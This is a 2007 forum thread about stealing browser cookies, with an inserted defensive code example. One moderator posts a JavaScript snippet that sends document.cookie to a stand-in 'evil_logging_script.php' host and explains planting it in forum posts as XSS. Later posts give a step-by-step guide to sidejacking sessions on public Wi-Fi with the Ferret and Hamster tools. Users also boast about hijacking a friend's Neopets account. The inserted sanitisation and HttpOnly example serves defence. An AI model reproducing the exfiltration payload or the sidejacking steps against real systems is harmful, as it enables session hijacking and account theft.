Grab Cookies

  • HygieneSetsco's Avatar
    331 posts since Aug '07
  • venny's Avatar
    1,433 posts since Aug '07
  • HygieneSetsco's Avatar
    331 posts since Aug '07
  • Moderator
    The only cure for procrastination is a terminal illness.
    LatecomerX's Avatar
    2,208 posts since May '07
    • Pay Famous Amos to sell you some ba.

      Anyway,

      1. It may be considered as an invasion of privacy. Don't you just love those spywares lurking somewhere within your computer, or the list of tracking cookies that shows up during your monthly clean-up?

      2. Technically it is not supposed to be possible through a web script, as cookies usually can only be accessed within the same domain. So for example, if you want to grab cookies created at sgForums.com, the script must be hosted in sgForums.com as well. But some almost-geniuses in the past have managed to do so through cross-site scripting and SQL injection due to vulnerabilities in scripts. (Hint: sgForums is rumoured to be using a very old version of phpBB. XD) Google those terms if you are interested.

      So, unless you plan to come up with a desktop solution, as in a spyware or some of its counterparts, in conclusion, this is not possible.

      Edited by LatecomerX 01 Sep `07, 11:05PM
  • Moderator
    ndmmxiaomayi's Avatar
    53,276 posts since Aug '05
    • Technically possible. There's even a tool to do that. Those who went to Defcon or Blackhat will know. Mr. Green

  • MooKu's Avatar
    33,833 posts since Dec '02
  • Moderator
    ndmmxiaomayi's Avatar
    53,276 posts since Aug '05
    • Cookies contain log in and session information. Grab that of course to steal password or to hijack a session.

      Session is the time between you log in to a website and the time you log out of a website.

  • HygieneSetsco's Avatar
    331 posts since Aug '07
  • amusing_dick's Avatar
    160 posts since May '07
    • and that's how I lost my Neopets account, which was still hot at that time, on a Windows 98 system with no knowledge of firewalls or any antivirus system..
      till one day someone conned me into his website and that's it.. my 2 yrs of effort gone down the drain..

  • Moderator
    The only cure for procrastination is a terminal illness.
    LatecomerX's Avatar
    2,208 posts since May '07
    • Originally posted by ndmmxiaomayi:
      Technically possible. There's even a tool to do that. Those who went Defcon or Blackhat will know. Mr. Green

      Shi meh? So far I only heard of traffic sniffing in wireless networks and XSS, now got tools to facilitate cookie stealing one ah?

  • Moderator
    The only cure for procrastination is a terminal illness.
    LatecomerX's Avatar
    2,208 posts since May '07
    • Originally posted by HygieneSetsco:
      so i guess i'm not allowed to learn how to do it?

      Hmm, there are plenty of sites out there to learn about XSS and SQL injection. But the issue here is about finding a vulnerability on a website that, say, will allow you to post unencoded HTML. So to grab cookie contents, you would probably write something like:

      code:
                              

      var url = 'http://example.com/evil_logging_script.php?cookie_contents=' . document.cookie;
      document.write('image');



      So for example, if you could plant this code into a forum post, as "raw" HTML, every time the post is loaded, the browser will attempt to load a 0 pixel by 0 pixel (aka unseen) image using the URL which is embedded with the user's cookie information. And on the other side, when the "image", which is a script, receives the request, it ignores it and does something like storing the cookie information that was passed to it through the URL.

      But most scripts around filter all these HTML tags from user input, so it is quite pointless unless you really have so much free time going around to try this out on different websites.

      If you are really interested, you can read the technical explanation of the infamous MySpace worm, aka the Samy Worm. It does not need to steal cookies - it uses the victim's computer to do what the coder wanted. Also, another reason why you are less safe using IE than other browsers - under Step 1, "However, some browsers (IE, some versions of Safari, others) allow javascript within CSS tags. We needed javascript to get any of this to even work".

      http://namb.la/popular/tech.html

      Edited by LatecomerX 03 Sep `07, 3:10AM
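The filtering mentioned in the post above, shown from the forum operator's side as an added example that is not part of the thread: every post is HTML-encoded before output, formatting comes back only through a small BBCode allowlist, and the session cookie is marked HttpOnly so page script cannot read it through document.cookie. All function names and the sample posts are constructed for illustration.

```javascript
'use strict';
// Added example, not code from the thread. All names here are hypothetical.

const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Step 1: encode every HTML metacharacter so user text can never become markup.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Step 2: re-introduce formatting only through an allowlist of BBCode tags.
// Links must start with http:// or https://, so a javascript: URL is never
// turned into a link and stays visible as plain text.
function renderPost(raw) {
  return escapeHtml(raw)
    .replace(/\[b\](.*?)\[\/b\]/gis, '<b>$1</b>')
    .replace(/\[i\](.*?)\[\/i\]/gis, '<i>$1</i>')
    .replace(/\[url=(https?:\/\/[^\]\s]+)\](.*?)\[\/url\]/gis,
      '<a href="$1" rel="nofollow noopener">$2</a>');
}

// Step 3: defence in depth. HttpOnly hides the session cookie from
// document.cookie, so script that does slip through cannot read it.
function sessionCookieHeader(name, value) {
  return `Set-Cookie: ${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; SameSite=Lax`;
}

// Constructed sample posts: normal BBCode, raw script markup, a javascript: link.
const SAMPLE_POSTS = [
  'Nice thread [b]guys[/b], see [url=http://example.com/faq]the FAQ[/url]',
  '<script>alert(document.cookie)</script>',
  '[url=javascript:alert(1)]click[/url]',
];

for (const post of SAMPLE_POSTS) {
  console.log(renderPost(post));
}
console.log(sessionCookieHeader('sid', 'abc 123'));
```
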
  • yiha093's Avatar
    2,302 posts since Jul '07
  • manyu882's Avatar
    1,830 posts since Jun '05
    • I still remember I hacked my friend's Neopets account using cookies. Twisted Evil . It was like 6 yrs ago..

      But now technology advances too fast. The login information will change if the person logs out from his account.

      Edited by manyu882 03 Sep `07, 10:17AM
  • Moderator
    ndmmxiaomayi's Avatar
    53,276 posts since Aug '05
    • Originally posted by LatecomerX:
      Shi meh? So far I only heard of traffic sniffing in wireless networks and XSS, now got tools to facilitate cookie stealing one ah?

      Ya, bluff you no money. Google some keywords and you will find that tool. I played with it, pretty cool tool.

  • Moderator
    The only cure for procrastination is a terminal illness.
    LatecomerX's Avatar
    2,208 posts since May '07
    • Originally posted by ndmmxiaomayi:
      Ya, bluff you no money. Google some keywords and you will find that tool. I played with it, pretty cool tool.

      Got lo. I just gave you my 2 cents. =P

      Anyway, is the tool related to this article, or some other stuff?

      http://blogs.zdnet.com/Ou/?p=651

      Edited by LatecomerX 04 Sep `07, 1:47AM
  • Moderator
    ndmmxiaomayi's Avatar
    53,276 posts since Aug '05
  • yiha093's Avatar
    2,302 posts since Jul '07
  • yiha093's Avatar
    2,302 posts since Jul '07
  • Moderator
    The only cure for procrastination is a terminal illness.
    LatecomerX's Avatar
    2,208 posts since May '07
    • Originally posted by yiha093:
      chim la hong gan Laughing Laughing Laughing Laughing

      Not really lo. Simply put, he's catching cookies in the air. So just be careful when surfing on public wireless hotspots - you never know if mayi is there. XD

  • Tremors's Avatar
    87 posts since May '07
  • yiha093's Avatar
    2,302 posts since Jul '07
    • Originally posted by LatecomerX:
      Not really lo. Simply put, he's catching cookies in the air. So just be careful when surfing on public wireless hotspots - you never know if mayi is there. XD

      I understand this
      chim la
      Laughing

  • Moderator
    The only cure for procrastination is a terminal illness.
    LatecomerX's Avatar
    2,208 posts since May '07
  • HygieneSetsco's Avatar
    331 posts since Aug '07
  • Moderator
    The only cure for procrastination is a terminal illness.
    LatecomerX's Avatar
    2,208 posts since May '07
    • Nope, I didn't get a chance to. I don't own a laptop, and people who are still on those "unsecured wireless networks" with routers within the range of my adapter are kinda rare.

      Anyway, there's a readme.txt and a Word document that should be able to guide you in getting the hamster running, not literally. And here's the link to download WinPcap.

      http://www.winpcap.org/install/bin/WinPcap_4_0_1.exe

      And here's the content of the readme.txt file.

      image

      If you encounter problems with one of the steps, maybe you could post a screenshot back with details onto this thread and wait for a reply, from mayi hopefully.

      Edited by LatecomerX 05 Sep `07, 4:57AM
  • Moderator
    The only cure for procrastination is a terminal illness.
    LatecomerX's Avatar
    2,208 posts since May '07
    • I have just finished reading the included Word document, and I can say that it is really helpful as it includes a step-by-step guide containing many screenshots; you would probably skip the chunk of text under "Sidejacking without Hamster" since it is a little advanced.

      Just to summarize things up a bit, mostly similar to their readme.txt,

      1. Install WinPcap.
      2. Unzip the contents of sidejacking.zip to C:\sidejacking or anything simple
      3. Hit Windows Key+R, run 'cmd' without the quotes
      4. In the black box that appears, type in 'cd C:\sidejacking' and press Enter. The next line should start with the same folder name as well.
      5. Type in 'ferret [dash]W' and Enter. If you get a packet.dll error, you would probably have forgotten about installing WinPcap
      6. A list of connection interfaces should then appear. Remember the number that represents your wireless device.
      7. Use a browser that you don't usually use, eg. IE. And configure its proxy options. Instructions for IE here.
      8. In the black box, type in "ferret.exe [dash]i [Number from Step 6]"
      9. Type in 'start hamster' thereafter. If you see a 'hamster.txt: No such file or directory' error, it means you screwed up somewhere along, or my summary is missing something. Always believe in yourself first. =P
      10. After setting up the proxy options at Step 7, go to 'http://hamster/'
      11. You should see a list of IP addresses here. Click on one of them.

      Extra, non-essential info:
      I'm quite inexperienced in networking, but I suppose those are IP addresses which are only used within the network to identify users so that the router or whatever knows where each data packet should go. This has nothing to do with cookies, btw.

      12. Click on one of the links on the left panel.


      You have three options here. You can view the raw cookies for this IP address (discussed below). You can click on a URL that has a HIGHER probability of being Sidejacked. Or you can choose from the URLs below, which have a lower probability of being Sidejacked.

      13. You did it, you jackfruit! gratz.

      And a disclaimer: this is solely for educational purposes. No ferret or hamster was harmed while I was experimenting with the tools. =P

      Edited by LatecomerX 05 Sep `07, 4:59AM